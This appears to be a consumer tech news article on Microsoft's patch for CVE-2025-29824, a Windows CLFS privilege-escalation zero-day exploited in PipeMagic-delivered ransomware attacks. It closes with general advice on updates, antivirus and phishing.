Of the 134 Windows security flaws fixed by Microsoft in yesterday’s Patch Tuesday updates, only one was a zero-day flaw That might be vulnerable to exploitation by hackers aiming to obtain higher system permissions.
Today however, Microsoft has stated that this issue (logged as CVE-2025-29824 ) has actually been employed as a zero-day exploit in specific attacks ransomware attacks.
Now that it has been addressed with a patch, it is crucial for Windows users to promptly download and install this update to safeguard their systems. Although the attacks targeted only a few international entities such as IT and real estate companies in the U.S., banks in Venezuela, a software firm in Spain, and retailers in Saudi Arabia, all unpatched systems remain susceptible.
This vulnerability is a privilege elevation issue within the Windows Common Log File System that could potentially allow an attacker to gain SYSTEM-level access when exploited. The Hacker News indicates that hackers particularly prize such vulnerabilities since they allow for broad exploitation enabling elevated privileges, and can also be employed to install ransomware on susceptible personal computers.
The attackers have utilized a piece of malware called PipeMagic for deploying both exploits and ransomware payloads; this marks the second time a Windows zero-day vulnerability has been distributed through this malware. The initial occurrence was tracked as CVE-2025-24983 It was also a privilege escalation issue, specifically affecting the Win32 Kernel Subsystem. This vulnerability was identified by ESET and addressed with a patch from Microsoft earlier last month.
Although the methods for obtaining initial access during these attacks remain unclear, evidence suggests that the attackers involved have utilized the certutil tool to fetch malware from a tainted third-party website serving as an staging area for deploying payloads. This ongoing malicious activity and the subsequent exploitation of the vulnerability has been identified and monitored by Microsoft, who refer to it internally as Storm-2460.
Ways to protect yourself against malware and ransomware
Patch Tuesday The event occurs on the second Tuesday of each month, so make sure to schedule a calendar alert to ensure you remember to update your computer during this period. Failing to keep your software updated provides an easy entry point for cyber attackers and malicious entities; thus, avoid leaving yourself vulnerable to such threats by overlooking essential updates. Additionally, consider setting up automatic updates and regular scan schedules for your security programs, as these measures are crucial components of safeguarding your system. best antivirus programs also installed on your computer.
Since Windows Defender Is integrated into Windows; you can also utilize it to routinely scan your system for malware or viruses. Additionally, make sure to follow secure browsing practices online. Check whether your antivirus security suite includes a fortified browser. VPN include an additional layer of security. However, always avoid clicking on links, attachments, or downloads from unrecognized senders or unfamiliar sources. Download applications and software exclusively from reputable app stores and verified developers, and learn to identify typical phishing attempts. phishing techniques.
Zero-day vulnerabilities offer a straightforward path for hackers and cyber criminals to initiate their assaults, which explains why information about these weaknesses commands a steep price. However, the primary defense against attacks leveraging zero-days remains promptly installing security patches once they’re released and maintaining robust online cybersecurity practices.
More from Tom's Guide
- Con artists are posing as QuickBooks in a late-stage tax phishing scheme, and they're pilfering financial information.
- Google has recently fixed two severe Android zero-day vulnerabilities being actively exploited by attackers — make sure to update your device immediately.
- T-Mobile has begun distributing data breach settlement payments of up to $25K. Check if you're eligible.
Enjoying this piece? To read more articles like this one, follow us on MSN by tapping the +Follow button at the top of the page.